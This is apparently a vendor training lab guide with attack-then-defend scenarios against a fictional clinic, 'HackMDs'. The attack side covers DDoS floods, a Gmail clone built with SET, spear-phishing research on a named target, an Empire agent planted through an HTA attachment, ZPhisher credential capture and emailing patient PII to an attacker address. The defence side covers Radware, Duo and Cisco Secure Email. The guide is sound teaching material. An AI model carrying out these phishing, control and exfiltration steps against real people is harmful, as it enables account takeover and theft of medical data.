In this lab, Mr. Orange will exploit a new HackMDs Web Application used to validate invoices. If you have used a payment application on the Internet for medical invoicing and billing of services, this application might seem familiar. The new HackMDs application, however, is horribly designed and allows an attacker to enumerate all accounts and perform many other nefarious actions. In the previous scenario, you were able to exploit this application until HackMDs deployed a Radware Web Application Firewall to protect it. Now it’s time to switch to a denial-of-service attack focus.

As the attacker, you will launch two attacks: a TCP RST flood and a UDP flood to port 80. Although stateful devices can mitigate these attacks, the goal of the flood attack you will be performing is to overwhelm a system with the number of packets per second. Radware Defense Pro’s BDoS policy can defend against these attacks by monitoring the patterns associated with these events in real-time and generate a real-time signature for mitigation.

Validate Radware DefensePro Configuration + Setup Monitoring

First, you will validate the Radware Defense pro configuration.

Procedure

1	Open the Google Chrome browser and go to https://vision.ad.hackmds.com or click the APSolute Vision bookmark. Log in using the username dcloud and the password C1sco12345.
2	On the left side of the screen, you will see the APSolute Vision image. This is the centralized management system for Radware technology. Go to that image and select the down arrow. This will bring up all of the systems managed by Radware Vison. Select DefensePro_HackMDS representing Radware’s DDoS defense tool.
3	Choose DefensePro_HackMDS, and then click the Lock icon to manage the device. You should see the Power button turn red showing you can now edit the system. Important: Do not press the Power button as that will power off the server.
4	Validate the configuration: Click Configuration > Protections > Protection Policies and make sure no Protection Profiles are attached.
5	Next, click the Putty icon to open a Putty session.
6	In the Host Name (or IP address) field, type 198.19.10.32 and click Open.
7	Log in with username admin and password C1sco12345. when you see the login screen, type `system inf-stats reset`.
8	Type `system inf-stats` to view that there is very little traffic going to the target. Consider this normal traffic to the HackMDs web server. Things look fine… for now…

TCP Flood Attack

TCP SYN Flood is one of the oldest, yet still powerful denial-of-service (DoS) attacks. The most common attack involves sending numerous SYN packets to the victim. In many cases, the attack will spoof the SCR IP meaning that the reply (SYN+ACK packet) will not come back to it. The intention of this attack is to overwhelm the session/connection tables of the targeted server or one of the network entities on the way (typically the firewall). Servers need to open a state for each SYN packet that arrives, and they store this state in tables that have limited size. As big as this table can be, it is easy to send sufficient amount of SYN packets that will fill the table, and once this happens the server starts to drop a new request, including legitimate ones. Similar effects can happen on a firewall which also has to process and invest in each SYN packet.

For this next part, you will launch a TCP Flood attack against the HackMDs web application.

Procedure

1	Go to the Kali Linux attack box. Open a terminal by selecting the terminal icon.
2	Enter `cd /opt/wgames/` at the prompt.
3	Type ./start.sh to run wgames.
4	Enter `./start.sh` and then select item 5 (TCP-RST Attack).
5	When the attack starts, you will not see any data outside of the tool letting you know it has started.
6	Go back to the jumphost. In the open putty session, enter `system inf-stats` to view the impact of the attack. Note: You should see a large amount of traffic coming in on port 1 (outside port). This represents the impact from a TCP Flood attack. This attack can take out any of the HackMDs services, including the HackMDs website.
7	Go back to the Kali Linux attack box. Stop the attack by clicking Ctrl + C.

DefensePro: Enable a BDOS Profile

Now, you will enable a BDOS profile to protect against TCP flood and other DDoS attacks. Currently, Radware is in a monitor-only mode.

Procedure

1	Go back to the jump host. Click Vision and enable the BDOS Protection Profile in your Lab by selecting Configuration > Protections > Protection Policies.
2	Double-click HackMDS-Radware.
3	This will bring up the configuration page for your profile. Select Profiles on the left. In the BDoS Profile select BDOS and then click Submit.
4	You should see that the protected profiles policy is now updated with BDOS. Its status should also show that it is enabled.
5	Click Update Policies to activate the configuration changes.
6	Go back to the attacker machine. Start the attack again (./start.sh and then select item 5 (TCP-RST Attack)).
7	Go back to the Jumphost. In Vision. Select Security Monitoring > Current Attack Table and you will see the attack details are displayed. Note: It might take a minute for the attack details to show in Vision. Be patient. You don’t have to refresh the page, because it will refresh on its own as the attack details start to show up.
8	You can use other displays to look for the attack. Click Ongoing Attacks Monitor to bring up this display.
9	You should see a B within a shield that is pulsing. This represents an active attack is occurring. Double-click the shield with the B to see more details. Explore the different items of data about the attack. The following image is an example of the Attack-Identification Statics Graph. Explore the other views.
10	Go back to the attacker machine when you are done viewing what Radware shows is being prevented. Stop the attack on the attack machine using CTRL + C.

UDP Flood

To start the next attack, we need to first disable the current policy that was used during the last attack scenario. This will put Radware DefensePro back in a monitor only state.

Procedure

1	Go back to the jumphost. Click the lock in DefensePro so you can make configuration changes.
2	Select Configuration > Protections > Protection Policies. Double-click your policy.
3	Uncheck the Enabled box, and then click Submit.
4	Click Update Policies.
5	Now it’s time to launch the second attack. Go back to the attacker machine. From the attack machine, in the terminal run cd /opt/wgames then ./start.sh. This time, choose option 7 wg_UDP_flood_p80.sh representing a UDP flood attack.
6	Go back to the jump host and check Security Monitoring in Vision. This is found by clicking the the shield and selecting Current Attack Table. Since Radware is in monitor mode, you will just see the warning message. It may take a minute for this to show up. You will also see previous attack alarms.
7	Web services will now be slow in accessing hackmds.com. Go back to the attacker box and stop the attack using CTRL + C.

DefensePro: Enable BDOS Profile and Use the AMS Dashboard

Procedure

1	Now, you will once again enable a protect policy (the BDOS policy) to prevent this type of attack. This will allow Radware to prevent this attack from impacting HackMDs services.
2	To go back to the policy, click Configuration > Protections > Protection Policies. Select your policy.
3	Double-click your policy. Check the Enabled box, and then click Submit.
4	Click Update Policies.
5	Go back to the attacker box and relaunch the attack. Use cd /opt/wgames and then ./start.sh. Choose option 7 wg_UDP_flood_p80.sh. Radware DefensePro will now mitigate the attack.
6	Go back to the jumphost. Select Security Monitoring > Current Attack Table and you will see the attack details are displayed. Note: It may take a minute for the attack details to show in Vision. Be patient. You don’t have to refresh the page, because it will refresh on its own as the attack details start to show up.
7	You can once again go to Ongoing Attacks Monitor to view the B in the shield. However, let’s look at a more focused dashboard called AMS. On the right, click the AMS icon to open multiple dashboard options. Click the first option called DefensePro Monitoring.
8	You will see a much more data-rich dashboard showing the attack. Notice you are being told you are “Under Attack” meaning you are seeing DDoS traffic right now. You can see the load and what is being dropped.
9	Next, click the DefensePro Attacks dashboard.
10	This will bring up a Traffic Bandwidth view which shows the active attack via the increase in traffic.
11	When you are finished reviewing the dashboards, go back to the attacker box and stop the attack using CTRL + C.

You have completed this short overview of using Radware DefensePro to prevent both volumetric and protocol based DDoS attacks. To learn more about Radware, visit radware.com. If you haven’t performed the web application firewall part of the Web Defense Resource and Sustainability Part 1 scenario, be sure to check that out. Stay secure!

Congratulations! You have completed this scenario.

Defend Identities and Prevent Password Compromise: MFA Saves the Day

Value Proposition: Security professionals will tell you that your people will likely be your weakest link in your cybersecurity posture. Two of the most common attacks against people is social engineering and phishing. The goal of these attacks is to trick the victim into clicking something, installing malicious software, or reveal the victim’s password. Rather than focusing on making passwords longer and more complex, it is best practice to have users validate identity upon connection to any resource with sensitive data, using multifactor authentication that identifies you by something you have, something you know or who you are. Cisco Duo can provide a simple method to address authenticating users, as well as prevent threats from stolen passwords or account takeover. Cisco Duo is a key component to meeting the industries latest Zero Trust guidelines.

In this lab, Mr. Black has assigned you, Miss Red, to create a social engineering attack campaign against HackMDs.

Your goal is to clone a trusted resource and trick the victims to access the fake resource using their real passwords.

When you clone a website, you will be able to launch various phishing methods to trick the victim to log into the fake website.

Note: You can use the same approach on your real network to test your organization’s ability to defend against social engineering / phishing attacks. Learn more about the current state of phishing attacks from NIST.gov at https://www.nist.gov/news-events/news/2018/06/youve-been-phished

Important: You must register your Duo account before the activation link expires or you won’t be able to perform the second part of this lab.

The second part of this lab will respond to the increase number of phishing attacks seen against HackMDs with a new deployment of Cisco Duo. Industry best practice for user security is not only to enforce multifactor authentication, but to ensure that every application and internal resource that contains sensitive information validates that this user is who they say they are and ensure this user is authorized for access.

If a user’s password is stolen through phishing, the attacker will not be able to access any sensitive systems since they will not be able to provide the Cisco Duo one-click validation. This is a much better approach than increasing password complexity and shortening password expiration, which leads to a negative impact for work productivity, as users fumble with creating new, complex passwords, along with the fact that this allows passwords to be vulnerable to social engineering attack.

Cisco Zero Trust architecture

The following image showcases Cisco’s Zero Trust architecture. This lab will focus on addressing the user access vulnerability, also known as “securing the workforce”.

Other tools that can help against phishing attacks are Cisco Umbrella, which prevents connecting to malicious sources, Cisco Tetration which monitors data center workflows, Cisco AMP which can detect if malware is placed on an endpoint and Cisco Stealthwatch, which can detect insider threats. Check out these tools in other Cyber Resilience Platform Modules!

Outcome

Learn how to deliver social engineering and phishing attacks using the Social Engineering Toolkit (SET). Gain experience deploying Cisco Duo and protecting users from account takeover and password compromise. Protect Splunk by enhancing authentication with Cisco Duo.

Lab Resources

Attacker Resource 1: Kali Linux Rolling Edition
Attacker Resource 2: The Social Engineering Toolkit (SET)
Defender Resource 1: Jumphost SOC administrator workstation
Defender Resource 2: Cisco Duo
Defender Resource 3: Cisco Duo Mobile Application
Defender Resource 4: Splunk
Defender Resource 5: You--the person running this lab who has your mobile phone ready

Mr. Black has assigned you, Miss Red, to harvest credentials from HackMDs users using social engineering and phishing techniques. In order to accomplish this, you will use the Social Engineering Toolkit (SET) to clone a source that is used by the HackMDs staff. One easy target would be Google Mail (Gmail) since it is likely somebody within the organization has a Gmail account. You will use a phishing attack to have a victim log into a Gmail website, which will capture their username and password. Once you own the Gmail account, you will be able to launch an internal social engineering campaign emailing from the compromised Gmail account.

Develop the Attack

Procedure

1	Connect to the Kali Linux server.
2	Start a terminal session: Click the terminal emulator icon at the bottom of the desktop.
3	Type the command `setoolkit` to start up the social engineering toolkit tool. You may have to answer “yes” to agree terms of service (basically saying you will only use this for pretend evil aka penetration testing).
4	You will see the main social engineering attack (SET) menu. Type `1` to enter the Social-engineering Attacks menu, and then click Enter.
5	In the next menu, type `2` to select Website Attack Vectors, and then click Enter.
6	In the next menu, type `3` to select the Credential Harvester Attack Method menu, and then click Enter.
7	Type `3` to select the Custom Import option, and then click Enter. Clone a trusted website: At this point, we want to trick the victim into believing the cloned site is the real version. This is where creativity comes into play. At this point, you can clone any website you like. For our example, we will clone the Gmail login page.
8	When you are asked to identify the source is for the cloned system (fake website), use your attacker system. Type `198.18.133.6`, and then click Enter. As previously stated, for our attack example, we will clone the Google Mail website, but you are welcomed to clone another website. We are using Gmail since the attacker can assume somebody will have a Gmail account. You will need to download the website.
9	To open a browser, go to the bottom of your desktop and click the ZAP icon.
10	Go to the website you want to clone. For our example, we will go to gmail.com and click until we see the login page. Once you see the page you want to clone, right-click the page and select “Save Page As”. The next image shows right-clicking the login page for accessing Gmail:
11	Choose the root directory and you will see a folder called “CloneWebsites”. Choose to save your website in that folder. You will need to rename the file you are saving to index.html. Also make sure it is saved as a complete website. Click save.
12	Now, go back to the terminal to finish configuring your attack within SET. Next, you need to enter the path of the website that is being cloned. The file must be an .index.html file as explained by SET. For our example, we put that file in /root/CloneWebsites/ so enter that path. Make sure you start and end with a “/”.
13	You will be asked to copy the index.html or entire folder. Choose 2 to copy the entire folder.
14	Next, you are asked about the URL of the website you are cloning. Gmail uses https://accounts.google.com so we will use that. This will be different if you are using a different website. Click enter.
15	You will see a prompt explaining how to use this attack. You will have to click enter representing you understand. Once complete, the Gmail website will be cloned and stored onto the attacker system, which IP address is 198.18.133.6. You will see a prompt representing the fake website is in listening mode. This means if somebody interacts with the website, you will gain any captured information. Don’t close the window! Leave this page up.

Test the Attack

Now that you created the fake website, you need to test it.

Procedure

1	From your web browser, go to 198.18.133.6. You will see the fake Gmail website or whatever website you cloned. What is key for our example is the login screen appears exactly as you would expect to see. The only major difference will be the IP address, but many untrained users will not notice this. With the right social engineer tactic, you could trick the user to log into this website.
2	Pivot back to the opened terminal to see captured data from anybody that interacts with the cloned website.
3	When you are done, you click Control + C to generate a report of data that was collected. Note that the key to this attack is getting your victim to believe this is a real Gmail account or forcing a redirecting from the real Gmail to this fake version. One option is using a phishing attack. You could create an email stating you have a new message from somebody important followed by CLICK HERE to access your message. If the victim clicks the link, they will be directed to the fake Gmail login screen. We performed an email based phishing exercise in the ransomware module. Feel free to test cloning other websites and accessing the fake website from other systems such as the Jump host. Here is an example of cloning www.thesecurityblogger.com and accessing the fake version of this website from the Jump host while its hosted from the attacker server (198.18.133.6). Let’s consider another approach that is like our advanced ransomware lab where we planted a remote access tool (RAT) also known as a backdoor. When you compromised the system, you could set requests to Gmail to bypass the real DNS address and use your fake website. This would mean anytime the victim attempts to access Gmail, they will be sent to the fake Gmail as DNS would be poisoned with the wrong IP address for Gmail. The following example is modifying a DNS entry to go to a different website other than the real Facebook website when attempting to access Facebook. The attacker could poison as many DNS entries as desired completely controlling what the victim will be able to access. Feel free to explore SET as it offers many other social engineering attack methods.

Set Up and Test Duo

It’s time to improve HackMDs’s authentication security to prevent the risk of stolen passwords or compromised accounts using Cisco Duo. If an account is compromised on a Duo protected system, the attacker will not be able to provide the Duo single click validation even if the attacker has a valid username and password.

Important: Be sure you have set up the Duo account before the activation link expires. Otherwise, you will need a new lab.

Procedure

1	On the Jumphost desktop, click the green icon with the white checkmark called Demo Ready.
2	On the Welcome to dCloud page, click the Activate button.
3	A new browser window opens for the Duo activation process.
4	On the Duo New Admin Setup page, click Get started.

Onboard User from Your Mobile Device

For this next exercise, we will pretend that one of your administrator team members needs access to Splunk. We will walk you through onboarding this new user. You can use the same mobile device you previously on which you installed Duo in the previous scenario.

Procedure

1	Sign in again. You should see the login credentials are already auto populated. If not, log in with `Admin` and `C1sco12345`.
2	When you log in, you will see you need to setup two-factor authentication. Click Start setup.
3	Choose a mobile device unless you are using a different device type.
4	You will be asked to enter your information. If you chose a mobile phone, you will be asked to enter the number.
5	Next, you will be asked the make of your mobile device. Choose and continue.
6	You will be offered to install Duo or say you already have it. If you are using the same device that you previously installed Duo on, click I have Duo Mobile Installed.
7	Before trying out your new login credentials, we need to create a user within Duo. Switch back to the Duo management interface on Jumphost1 and select Users from the left panel.
8	Click Add User to add a new Duo user.
9	Give your new user a name, and then click Add User. For our example, we will call this person labuser.
10	Our last step is to associate the new user with the mobile device you used to represent the new administrator accessing Splunk. Click 2FADevices to bring up the devices known to Duo.
11	Click the phone number you used for this lab.
12	You will see the Duo info associated with the phone number you previously added. Click “Attach a user”. For this example, we recently deleted a user named dcloud, which is show in in the next image. Any users that are deleted are pending for a certain time period.
13	You will be asked to search for the user you created to represent your new administrator of Splunk. Type the username, select the user when it comes up. Click Add User. Now you will see the new user associated with the phone number as well as the admin if you used the same device. If you used different devices, it should be represented here as Duo tracks number associations to Duo accounts.
14	Finally, go back and try logging into Splunk. You will be prompted to use your Duo one-click second factor after you log in with the user `admin` and password `C1sco12345`. Click any option you want to test. For example, if you choose “Send Me a Push”, you will see a notification on your phone.
15	Click Approve on your mobile device and you will be logged into Splunk.
16	Feel free to explore the Duo management interface, application and how the technology works. You can practice securing other applications within the HackMDs environment. When you are finished, you are welcome to delete Duo application or click the Plus sign within the Duo application and delete any accounts you no longer want to use. Congratulations! You have completed this scenario.

Protect Your Applications

Procedure

1	You should now be logged into Cisco Duo as the new administrator.
2	First, let’s go to the main dashboard. You will see a menu on the left. Click Dashboard.
3	Now, we need to protect some HackMDs applications with Duo. Remember, Duo is all about having the application authenticate the user. Click Applications to bring up the application configuration menu. Within that page, click the “Protect an Application” button.
4	Scroll down to see tons of applications that can be protected by Duo. For example, if you type Ci, you will see applications that start with Ci including Cisco and Citrix solutions. Since Splunk is one of our main dashboards for monitoring for threats at HackMDs, it would make sense to protect that application from an administrator’s account being compromised.
5	Type `splunk` into the search to bring up details on protecting Splunk with Duo. Click Protect this Application.
6	Observe the different keys required to integrate Duo with Splunk. These keys are your secret passwords and unique to your deployment. If you click select, it will generate a key as shown. Next, you need to setup Duo on Splunk.
7	Click the Splunk tab within the web browser, or go to https://splunk.ad.hackmds.com:8000 and log in within the username admin and the password `C1sco12345`. You should see the Splunk main dashboard.
8	At the top of the page, select Settings, and then go to the bottom right of the screen and click Authentication Methods.
9	Observe that there are different options for user authentication. For Multifactor Authentication, select Duo.
10	When the link to Configure Duo Security displays. click that link.
11	Now you need to go back to your Duo manager to obtain the keys being requested by Splunk. Note that when you click the Select button to the right of a key, Cisco Duo generates your key if you haven’t already done this in the previous step which showcases the keys.
12	Fill out each item within Splunk using the requested keys you generated in Duo. For our lab example, we will not modify the Application Security Key. You are welcome to create your own or if you leave it, you will be using the key automatically generated by Splunk. You also have the option to enable user login when Duo is not available, which is what we will use for our example. It is recommended in a real deployment to not let a user log in when Duo is not available.
13	In the bottom right corner of the window, click Save. Splunk is now protected by Cisco Duo.
14	Click Administrator, and then select Logout.

Email Exploitation

Value Proposition: Email continues to be the number one threat vector. This is due to multiple reasons. For example, the target is a very vulnerable one-- people! Simplicity of launching email-based attacks and availability of email targets means that email attacks can come from anywhere at any time. This lab includes a variety of scenarios you can use to teach how real-world email attack campaigns are executed. Use this lab to showcase why the security industry recommends a layered email defense strategy which includes behavior, signature, and anti-phishing features.

The Players

Mr. Black has hired Mr. Brown (you) to perform a sophisticated social engineering attack on against HackMDS. The first stage of the attack will be to identify a worthy target such as somebody in middle management or a director. You will learn everything you can about this target and use your research to develop a spear phishing email that looks so legitimate, your target will not only open the email, but also click any links in the body of the email.

Background Story

One good place to start is searching on LinkedIn using the term ‘HackMDS’ and browsing the people returned in your search. Unfortunately, LinkedIn is only returning C-level executives and not matching your target IT manager profile. You decide to check blog posts and technical articles as IT directors occasionally publish on these resources. To find a target, you search Google using “HackMDS moves to Cloud” but get nothing. You try again, “HackMDS Cloud Computing,” nothing. “HackMDS Network Upgrade”, BINGO! You come across an article in Network Computing magazine titled “Upgrading Healthcare Networks” that was published just last year. In the article you see a quote for a ‘Lawrence Peterson – Director of IT, HackMDS’. You quickly pivot back to LinkedIn and lookup Lawrence Peterson, and sure enough, he still works for HackMDS. Target acquired!

Next Step

Now that you have a target identified, the next step will involve learning all you can about Lawrence Peterson. You start by creating a fake LinkedIn profile where you work in IT for a nearby hospital. You send Lawrence Peterson a connection request and in the note of the request you reference the article from Network Computing magazine. With the context from the Network Computing article embedded in your request, Lawrence Peterson joins your LinkedIn network. Building upon the LinkedIn connection, you learn more about Lawrence Peterson from other social media, including family pictures that appear to include a high school age child.

You noticed a LinkedIn post from Lawrence mentioning a five-minute commute to the office, which enabled you to conclude what high school district he resides in. You search the public activities calendar for Washington Union High School web site and notice there is field trip planned to nearby ski resort. Your investigation is done! Your attack vector will be a fake email to from Washington High School to Lawrence Peterson crafted to look like a permission slip for the student to attend the ski trip.

Important:

Before you begin these scenarios: You must log in to Jumphost 2 and Dr. for this lab to work. Jumphost 2 represents lpeterson, who will be a target for the attack.

Lab Resources

Attacker Resource 1: Kali Linux sitting on the outside network
Attacker Resource 2: Ubuntu Server hosting various tools for the attacker
Attacker Resource 1: HackMDs internal IT administrator
Attacker Resource 2: HackMDs internal doctor
Attacker Resource 1: Cisco Secure Email (previously called Email Security Appliance)

Spear Phishing Time!

In this lab, Mr. Blue (you) will craft a realistic looking email to look as if it came from the target’s son’s High School. You will use a script to send this email, but you are encouraged to view the content of the script to see what it is doing before sending it.

Procedure

1	Connect to the Kali Linux system from the GUAC server: From the Kali Desktop, right-click and select Open Terminal.
2	Type the following commands to list the content of the script: `a) root@kali:~# cd /root/EmailAttack b) root@kali:~# more ./emailattack-step1.sh` If you view the basic structure of the script, you notice it uses the mutt utility to send an email to lpeterson@hackmds.com. You may also notice the script is changing the muttrc file, which effectively changes the sender’s name. After the email is sent, notice we are starting the empire tool in the background using the Linux screen utility with this command: screen -dms empire ./empire. We also need to start a local web server that will be used to interact with our target workstation. When the web server is started, it will be listening on port 9000 with the command: `python3 -m http.server 9000 &` . Note: The trailing & character runs the command in the background, which frees up your terminal window prompt for future use.
3	Start the spear phishing attack by running the script with following command: `a) root@kali:~# ./emailattack-step1.sh` You’ll notice the output of the script prompts you to run screen -r empire to attach to the empire session. We will revisit this terminal window later in the lab.
4	In the next step we will need to switch roles to the IT administrator that is the target of the spear phishing email. Login to jumphost and use the Remote Desktop link on the desktop to login to IT Admin host with IP: 198.19.30.100. Login with username: hackmds/lpeterson and password: C1sco12345
5	When you have logged into the IT admin workstation, click the Outlook icon on the Windows Taskbar to start up Outlook.
6	Remember, you’re acting as the target now. You see an email from you (the attacker) but shown as from Washington Union High School, which your son attends. Note: The mastery in this attack scenario was the social engineering research performed before the attack. The attack itself is nothing special as we are just using some generic tooling to own a target. The body of the email looks legitimate and asks you to save the attachment named WUHS-permslip.hta, which you need to save now.
7	Save the attachment to whatever folder Outlook defaults to:
8	Open Windows file explorer and open the WUHS-permslip.hta file by double-clicking it:
9	You will see a form that appears to be a legitimate permission slip:
10	Switch back to the Kali Linux host. On the terminal window from where you started the attack, you’ll notice the output of the script prompts you to run screen -r empire to attach to the empire session. Do that now with the following command: `root@kali:~#: screen -r empire`
11	After starting Empire, you should notice an active agent connected to your Empire session. The active agent will be show in green text with a ‘+’ sign on the left. Take note of the agent name that Empire assigned to the agent. It will be an 8 character name that you will use to control the agent. Type “agents” at the Empire prompt and you will see some details on the active agent:
12	Now we will use Empire to interact with the agent. Type interact <agent_name> where agent_name is the eight-character Empire agent name listed for your environment. We should now have control of the remote workstation. Next, let’s get the username of the logged in user by using the shell “whoami” command:
13	Note the whoami command output also gave us the windows domain name (hackmds) which will prove valuable later. Let’s also use the Windows directory command to see where we are on the filesystem, which will give us an idea where to go to find some loot! Type ‘shell dir’ to list the name of the current working directory as well list the contents of that directory:
14	We can see from the output of the ‘dir’ command that there is a file named ‘Physician Training.xlsx’ as well as our dropper file in the Documents directory. Let’s use Empire to download the Physician Training.xlsx file in hopes that we can gain some intel that we can use in a later scenario to escalate this attack. Type ‘download “Physician Training.xlsx” (with double quotes around the filename as it contains a space):
15	We now have our loot downloaded to the Empire downloads directory. Use the Kali Linux file explorer to browse to that directory, then open the file with Libre which is an opensource viewer for excel files. Click the ‘Applications’ menu in the top left of your Kali desktop, then choose ‘File Manager’:
16	Within the Kali File Manager, browse to the Empire downloads directory in ‘/opt/Empire/downloads’, then browse into the directory named after your agent, then into ‘C:/Users/lpeterson/Documents’:
17	Double-click the ‘Physician Training.xlsx’ file. This should open LibreOffice, which will display the contents of our loot. Note: This file was exfiltrated from an IT administrator. It appears that there are several physicians being trained on the new cloud-based patient record system. Because they have not gone through the training, those physicians might be storing patient records locally on their workstations.

Good job! Let’s leverage this to escalate our attack in the next scenario!

Expand the Attack to the Doctor Workstation

In the last section, you were able to use social engineering to get the target, IT administrator Lawrence Peterson, to save and open a malicious email attachment. That attachment created a reverse connection to your Kali Linux host that was acting as your command & control server. We were able to browse the filesystem of Lawrence Peterson’s workstation and download a file named ‘Physician Training.xlsx’. Contents of that file revelated the usernames and emails of several physicians.

Let’s further our attack by building upon the intel obtained. You will use ZPhisher tool to phish one of the doctor’s emails found in ‘Physician Training.xlsx’:

Procedure

1	Connect to the Kali Linux system from the GUAC server. From the Kali Desktop, open a terminal window by right-clicking on the desktop and selecting Open Terminal
2	Type the following commands to list the content of the script: `root@kali:~# cd /root/EmailAttack` `root@kali:~# more ./emailattack-step2.sh`
3	Take note of the basic content of the script. The first thing you’ll notice is we are checking if zphisher is running. If it is not, we gracefully exit and ask you to first start zphisher. If zphisher is running, we will pull the URL generated by zphisher and insert it into the HTML email that we will then send to dhowser@hackmds.com.com . Now that you’ve reviewed what we’re doing, let’s do it. Run emailattack-step2.sh as follows:

root@kali:~# cd /root/EmailAttack
root@kali:~# ./emailattack-step2.sh

4	You should see an error that zphisher is not running:
5	As described in the error, open a new terminal windows and start ZPhisher as follows:

root@kali:~# cd /opt/zphisher

root@kali:~# ./zphisher.sh

6	From the ZPhisher main menu, select option 03 Google, and then choose option 1 for Gmail Old Login Page.
7	ZPhisher will generate a web page that appears exactly like the Classic Gmail Login. It will host that page on a ngrok.io domain and list the URL that you can paste into your email body that gets sent to your target. In the case of our lab, we have done that part for you. This is the CDC customization you see in the red box as shown in the next image.
8	For the CDC lab, we added logic to the emailattack-step2.sh script to automatically pull the ngrok.io URL and insert it into our HTML payload. All you need to do is run the emailattack-step2.sh script. Let’s do that now. Open a new terminal window and run emailattack-step2.sh:

root@kali:~# cd /root/EmailAttac

root@kali:~# ./emailattack-step2.sh

9	Log in to the GUAC server and open a session to the DR workstation. We sent our phishing email to physician dhowser@hackmds.com. Next, we need to play the role of the physician and open the email. Tip: If you see the ZPhisher email error, you need to go back and run Zphisher again. It may take you a few attempts before you see the message that the email was sent after running ./emailattack-step2.sh Note: If you performed a previous lab that involved installing Cisco Secure Endpoint (AMP), you will need to remote that from the doctor’s workstation. Do this by going to the control panel within the Dr.’s workstation, choosing Programs and Features and choosing to remove Cisco AMP for Endpoints Connector.
10	On the DR workstation, open the Outlook email client. You should see a new email from Lawrence Peterson sent from our phishing email dhowser@hackmds.com:
11	Continue playing the role of the doctor and click the ‘Get Started’ link in the email to login into the doctor’s Google account. Type `dhowser@hackmds.com` for your email, and C1sco12345 as your password: Tip: You might notice the `ngrok.io` URL in the browser and think that no savvy user would enter their credentials into a browser that displayed that URL. Well, the typical non-technical user is not savvy, and in a real attack the attackers would register a domain name that appeared close to the domain name being spoofed; for example, `gmailgooglelogin.io`.
12	Pivot back to your ZPhisher page and you will see the credentials for our target physician have been captured:

Exfiltrate Patient Records from Dr. Workstation

We learned from the ‘Physician Training.xlsx’ worksheet exfiltrated earlier in this scenario the usernames and IP addresses of several doctor workstations. You were able to use ZPhisher to compromise the credentials of one of these doctors. Next, you will use this data to exfiltrate patient record PII from the DR workstation.

Procedure

1	Connect to the Kali Linux system from the GUAC server. From the Kali Desktop, right-click, and select Open Terminal.
2	Type the following commands to list the content of the script: `a) root@kali:~# cd /root/EmailAttack b) root@kali:~# more ./emailattack-step3.sh` Note: Yes, this is a very simple script. All we are doing here is launching a remote desktop client from Kali Linux with the correct options to attach to DR workstation. We just learned the credentials of our targeted physician (dhowser@hackmds.com), so we can leverage those stolen credentials, coupled with the data we learned earlier in this scenario to login directly to that workstation.
3	Start the attack: Run the script with following command: `a) root@kali:~# ./emailattack-step3.sh`
4	You should see Windows RDP client launch. Click the Other User icon which will allow us to login as dhowser.
5	Type the credentials you learned from the ZPhisher attack. Username: `hackmds\dhowser` and Password: `C1sco12345`.
6	When logged in, you should see the Windows desktop of user dhowser. Let’s look for anything interesting to exfiltrate. The highest value data would be healthcare records. Open the Windows file explorer and go to the ‘Documents’ directory. You should see a file named Howser-PII.xlsx.
7	Looks like we found some loot! Double-click the file to see what you have found: Wow! That confirms that the PII in the filename indeed stands for Personal Identifiable Information. How are we going to exfiltrate this? You could take a screen shot, but what if the file was thousands of lines? Trying to use a file transfer protocol like FTP or SCP might be blocked by the firewall. What other options do we have? How about email?
8	From the Windows taskbar, open Outlook.
9	With Outlook opened, send an email to dcloud@attack.com: Type anything you like for the subject and attach the Howser-PII.xlsx file to the email.
10	Press Send to send the email.

Mission accomplished! At this point, you have stolen PII data that can be sold on the darknet or used to extort the hospital.

Defense with Cisco Secure Email

In this scenario, you will switch to the Defender's side to prevent all the failures that occurred during the last attack. This includes deploying a layered email defense strategy. Cisco Secure mail can block all the techniques you just used as the attacker. It works with what we call the Email Pipeline which covers incoming or outgoing email.

Incoming emails can be blocked at the beginning of the connection (SMTP 3-way handshake) by using Reputation filtering, SPF, DKIM, etc. Cisco Secure Email can detect virus and malware with multiple detection Engines including McAfee, Sophos and of Cisco’s own Talos. Thus, an email can be accepted when the 3-way handshake starts but then there will be a lot of control (the Pipeline) where inconsistencies can be detected. The administrator can handle the email with several options such as:

Dropping the message
Delivering the email without the attachment
Rewriting the email headers
Sending the email to an optional destination address
Sending attachment to a sandbox
Other options

Note:
You can read more about Cisco Secure Email here: https://www.cisco.com/c/en/us/products/security/email-security/index.html

In this scenario, we will enable our defense. In this lab you will act as a HacksMDS security administrator and configure an incoming email policy to protect IT admin users. Typically, this policy would be applied to all users, or a group of uses. For the purposes of this lab, we will focus only on protecting Lawrence Peterson.

Procedure

1	Connect Jumphost GUAC server. From Jumphost open Firefox and select the ESA tab (which should already be opened). You can also type on the URL bar https://smtp.hackmds.com.
2	On the ESA configuration page you will see ‘My Dashboard’ with helpful information about incoming and outgoing emails, detections by type, and so on and so forth. Examine the variety of rich data that you can see: Now, you will configure our defense on Cisco Secure Email. Cisco Secure mail can be integrated with LDAP or Azure AD (in case you have Cisco Cloud Email Security Appliance). Let’s define a policy to detect spear phishing attacks.
3	Go to Mail Policies > Incoming Mail Policies.
4	Click Add Policy, and Name your Policy IT_Admin_Policy.
5	Click Add User.
6	You´ll see a variety of options, we could add the IT admin group from AD but in this case we´ll focus on Lawrence Peterson who is an IT Admin. Select Any Sender, on the right select “Following Recipients” and add lpeterson@hackmds.com, click OK.
7	Click Submit.
8	Click Commit Changes, and then click Commit Changes again to complete the save.
9	Go to Security Services > Antivirus and choose Sophos. Note: You could also enable McAfee; therefore, you can use two detection engines plus Advanced Malware Protection. In this scenario, you are enabling Sophos. For your customer location, you can also enable McAfee.
10	Verify that Anti-Virus Scanning by Sophos Anti-Virus is enabled.
11	Go back to Mail Policies and choose Incoming Mail Policies,
12	Click Anti-Virus. In the Anti-Virus column, click “(use default)."
13	Look at the available options. Enable Sophos and choose Use Sophos Anti-Virus .
14	For Virus Infected Messages, choose Deliver As Is. The malware will be drop later with AMP.
15	Click Submit.
16	Next, you will enable Advanced Malware Protection features. Go to Security Services > File Reputation and Analysis.
17	Enable File Reputation and Enable File Analysis.
18	When you have enabled file Analysis, a new screen will display file types to inspect. Select all and click Submit.
19	Go back to Mail Policies > Incoming Mail Policies.
20	Below the IT_Admin-Policy, hover over (use default) just below the “Advanced Malware Protection” column.
21	Options for Advanced malware protection for that policy will appear. Choose to enable file reputation, and for Message with Malware attachments, select Drop Message.
22	Click Submit to bring up the Incoming Policies Dashboard.
23	At the top right, click Commit Changes.
24	Click Commit Changes.
25	We are very close to testing the defense against spear phishing. Open Putty on Jumphost and connect to ESA with username “`admin`” and password “`C1sco12345`”
26	When you are logged in, type “`tail mail_logs`." This will render a detailed log for the incoming emails.
27	Go back to Kali and execute `emailattack-step1.sh` on the /root/EmailAttack Directory
